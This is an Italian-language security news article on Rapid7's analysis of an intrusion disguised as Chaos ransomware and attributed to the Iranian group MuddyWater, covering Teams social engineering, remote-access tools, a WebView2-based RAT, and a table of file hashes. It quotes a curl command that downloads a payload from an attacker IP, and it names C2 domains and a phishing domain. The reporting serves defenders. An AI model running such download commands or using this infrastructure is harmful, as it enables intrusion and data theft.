Red Hot Cyber
Sicurezza Informatica, Notizie su Cybercrime e Analisi Vulnerabilità
Un attacco informatico, attribuito al gruppo ransomware Chaos, ha rivelato una nuova tendenza nel mondo delle operazioni informatiche criminali. Gli attaccanti utilizzano tattiche di ingegneria sociale per introdursi all'interno delle organizzazioni simulando un attacco ransomware, anche se lo scopo è puramente lo spionaggio.
Una intrusione inizialmente attribuita al gruppo ransomware Chaos, svoltasi nel primo trimestre 2026, ha mostrato delle caratteristiche molto diverse da una classica operazione ransomware. Gli analisti di Rapid7, sono riusciti ad identificare degli indicatori compatibili con una campagna sponsorizzata dallo Stato iraniano. Un dettaglio importante è il certificato digitale “Donald Gay”, il quale era stato osservato in precedenti attività associate a MuddyWater. Si tratta di un gruppo APT collegato al Ministero dell’Intelligence e della Sicurezza iraniano (MOIS).
Dietro al gruppo APT, Chaos si nascondeva una operazione costruita per sembrare cybercriminale ma non lo era affatto. Gli attaccanti infatti, non hanno dato priorità alla cifratura dei file come avviene spesso nei ransomware tradizionali, al contrario hanno puntato sulla sottrazione dei dati e sul mantenimento della persistenza alle reti compromesse.
| Field | Value |
| Name | Donald Gay |
| Issuer | Microsoft ID Verified CS AOC CA 02 |
| Algorithm | sha384RSA |
| Thumbprint | B674578D4BDB24CD58BF2DC884EAA658B7AA250C |
| Serial Number | 33 00 07 9A 51 C7 06 3E 66 05 3D 22 9B 00 00 00 07 9A 51 |
| Status | Time-invalid (revoked shortly after deployment) |
L’accesso iniziale, è avvenuto attraverso un software altamente diffuso ovvero Microsoft Teams. Gli operatori hanno contattato i dipendenti delle aziende fingendosi personale IT, e questo è un classico in operazioni malevole. Durante queste conversazioni, hanno fatto avviare ai dipendenti delle sessioni di condivisione schermo e convinto le vittime a digitare le loro credenziali in file locali denominati “credentials.txt” e “cred.txt”.
In molte occasioni, gli attaccanti hanno installato il software di controllo remoto AnyDesk sulla macchina della vittima per poter consolidare l’accesso. Successivamente, i malintenzionati hanno eseguito comandi sui computer delle vittime per effettuare una ricognizione con whoami, ipconfig /all e nslookup, per raccogliere informazioni sull’ambiente compromesso.
Rapid7 ha identificato il dominio adm-pulse.com, il quale è stato utilizzato come pagina di phishing travestita da Microsoft Quick Assist. La pagina è servita a sottrarre le credenziali e a manipolare la Multi-Factor Authentication, aggiungendo dei dispositivi controllati dagli aggressori.
Dopo il furto delle credenziali, il gruppo di malintenzionati, ha iniziato a utilizzare account interni legittimi e quindi muoversi lateralmente nella rete. Le connessioni RDP sono state usate per raggiungere i sistemi critici, compresi alcuni Domain Controller.
Per mantenere la persistenza gli operatori hanno installato DWAgent. Nel corso dell’analisi sono stati osservati file come dwagent.exe, dwagsvc.exe e pythonw.exe. Quest’ultimo elemento non è un caso che abbia attirato l’attenzione dei ricercatori. MuddyWater infatti utilizza spesso interpreti Python per caricare codice malevolo direttamente nei processi sospesi.
Successivamente è stato scaricato il payload ms_upd.exe tramite il comando:
curl hxxp://172.86.126[.]208:443/ms_upd.exe -o C:\ProgramData\ms_upd.exe
Una volta eseguito il file ha avviato una catena di infezione multi-stage che ha portato all’installazione del malware Game.exe.
Gli analisti hanno scoperto che Game.exe altro non era che un RAT personalizzato mascherato da applicazione Microsoft WebView2. Il malware derivava da un progetto di Microsoft, alterato in alcune delle sue parti dagli attaccanti. Il percorso PDB individuato durante l’analisi faceva riferimento infatti a WebView2APISample.
Implementava tecniche anti-analisi abbastanza eterogenee e cercava DLL associate alle sandbox come sbiedll.dll e dbghelp.dll, verificava la presenza di ambienti virtualizzati VMware o Hyper-V e controllava eventuali anomalie temporali attraverso chiamate Sleep().
Eppure alcuni elementi risultavano lasciati in chiaro. Comandi RAT, percorsi dei file e stringhe JSON non erano offuscati. Vale la pena ricordarlo perché questa incoerenza tecnica ha permesso ai sistemi EDR di intercettare parte dell’attività malevola durante l’incidente.
La RAT comunicava con il server C2 uploadfiler.com sulla porta 443 e supportava diverse funzionalità operative:
Uno degli aspetti molto insoliti dell’operazione riguarda l’assenza della cifratura dei dati. Chaos è noto come ransomware-as-a-service specializzato in double extortion. In questo caso però il gruppo ha pubblicato dati rubati senza utilizzare realmente il modulo ransomware.
Gli attaccanti hanno inviato email di estorsione ai dipendenti dichiarando di aver sottratto documenti sensibili. Hanno anche fornito link .onion per avviare le trattative. Tuttavia alcune prove iniziali presentavano incongruenze. Gli aggressori sostenevano di aver lasciato file contenenti credenziali nei desktop delle vittime ma le verifiche di Rapid7 non hanno trovato alcuna traccia.
Di conseguenza gli analisti hanno iniziato a considerare la pista del “false flag”. L’operazione imitava una campagna ransomware ma il comportamento reale assomigliava molto di più a una attività di cyber espionage.
L’attribuzione definitiva rimane complessa. Tuttavia diversi indicatori tecnici convergono verso MuddyWater, noto anche come Seedworm.
Il certificato di firma “Donald Gay” utilizzato per ms_upd.exe era già stato collegato alla campagna “Operation Olalampo”, attribuita a operatori iraniani attivi contro organizzazioni occidentali e del Medio Oriente. Anche il dominio moonzonet.com, usato come server C2, era comparso in precedenti attività contro obiettivi israeliani.
Forse il dettaglio meno ovvio riguarda proprio la scelta di sfruttare il brand Chaos. Dopo alcune operazioni pubblicamente attribuite all’Iran nel 2025 il gruppo sembra aver iniziato a utilizzare infrastrutture e marchi ransomware differenti per aumentare la plausibile negabilità.
L’incidente conferma una tendenza osservata molto spesso negli ultimi mesi: gruppi sponsorizzati dagli Stati stanno adottando tattiche tipiche del cybercrime per nascondere le proprie finalità operative.
Nel caso analizzato da Rapid7 il ransomware sembra avere avuto soprattutto una funzione di copertura. Gli strumenti di accesso remoto come DWAgent e AnyDesk hanno consentito agli operatori di mantenere accesso prolungato ai sistemi compromessi mentre la componente estorsiva serviva a distrarre i team difensivi.
Pertanto le organizzazioni non possono limitarsi a cercare la cifratura dei file o le classiche ransom note. Tecniche di social engineering via Teams, manipolazione della MFA e abuso di strumenti remoti legittimi stanno diventando molto spesso il vero vettore di compromissione nelle campagne APT moderne.
| File Name | SHA 256 | Description |
| ms_upd.exe | 24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14 | Initial Downloader ms_upd.exe |
| DIDS.exe | a92d28f1d32e3a9ab7c3691f8bfca8f7586bb0666adbba47eab3e1a8faf7ecc0 | Initial Downloader found during hunt on public repositories |
| Game.exe | 1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6 | RAT found during hunt on public repositories |
| WebView2.exe | 3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90 | RAT |
| visualwincomp.txt | c86ab27100f2a2939ac0d4a8af511f0a1a8116ba856100aae03bc2ad6cb0f1e0 | Encrypted config holding C2 url and port information |
| WebView2Loader.dll | a47cd0dc12f0152d8f05b79e5c86bac9231f621db7b0e90a32f87b98b4e82f3a | DLL downloaded by ms_upd.exe |
| dwagent.exe | cd098eddb23f2d2f6c42271ca82803b0d5ac950cb82a9b8ae0928e83945a53df | Remote Management Tool leveraged by the TA |
| dwagent.exe | cf3dfd1d6626fd2129abb7a5983c11827f4b0d497e2dba146a1889bd71f23cd5 | Renamed pythonw.exe |
| dwagsvc.exe | a3bac548b5bc91c526b4d6707623ddbd1a675aa952f0d1f9a0aa6f7230f09f23 | Service binary of DWService |
| dwaglnc.exe | 86e0197389f0573eb83ff53991f337d416124c7c8bd727721ef3d396cd5f65d | Background and system tray binary of DWService |
| AnyDesk.exe | bfc1675ee1e358db8356f515aaded7962923e426aa0a0a1c0eddfc4dab053f89 | Remote Management Tool leveraged by the TA |
